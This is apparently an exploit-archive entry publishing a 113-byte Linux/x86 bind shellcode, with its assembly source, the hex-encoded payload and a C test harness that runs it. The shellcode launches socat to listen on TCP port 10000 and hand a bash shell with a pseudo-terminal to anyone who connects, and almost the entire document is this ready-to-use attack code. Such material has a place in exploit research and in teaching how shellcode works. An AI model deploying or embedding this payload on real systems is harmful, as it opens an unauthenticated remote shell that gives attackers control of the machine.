Linux/x86 Socat Bind Shellcode

113 bytes small Linux/x86 Socat bind shellcode.


MD5 | bb6b9dc9e8fde4989a5257fab4161276

/* Exploit Title: Linux/x86 - Socat Bind Shellcode (113 bytes)
Date: 01-19-2021
Author: Felipe Winsnes
Tested on: Debian x86
Shellcode Length: 113

global _start

section .text

_start:

xor eax, eax
push eax

PUSH 0x30303030 ; "tcp-listen:10000"
PUSH 0x313a6e65
PUSH 0x7473696c
PUSH 0x2d706374

mov esi, esp
push eax

PUSH 0x2c656e61 ; "exec:'bash',pty,stderr,setsid,sigint,sane,"
PUSH 0x732c746e
PUSH 0x69676973
PUSH 0x2c646973
PUSH 0x7465732c
PUSH 0x72726564
PUSH 0x74732c79
PUSH 0x74702c68
PUSH 0x7361623a
PUSH 0x63657865

mov edi, esp
push eax

PUSH 0x7461636f ; "///usr/bin/socat"
PUSH 0x732f6e69
PUSH 0x622f7273
PUSH 0x752f2f2f

mov ebx, esp
push eax

mov edx, esp

push esi
push edi
push ebx

mov ecx, esp
mov al, 11
int 0x80
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x50\x68\x30\x30\x30\x30\x68\x65\x6e\x3a\x31\x68\x6c\x69\x73\x74\x68\x74\x63\x70\x2d\x89\xe6\x50\x68\x61\x6e\x65\x2c\x68\x6e\x74\x2c\x73\x68\x73\x69\x67\x69\x68\x73\x69\x64\x2c\x68\x2c\x73\x65\x74\x68\x64\x65\x72\x72\x68\x79\x2c\x73\x74\x68\x68\x2c\x70\x74\x68\x3a\x62\x61\x73\x68\x65\x78\x65\x63\x89\xe7\x50\x68\x6f\x63\x61\x74\x68\x69\x6e\x2f\x73\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x89\xe2\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";

main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Related Posts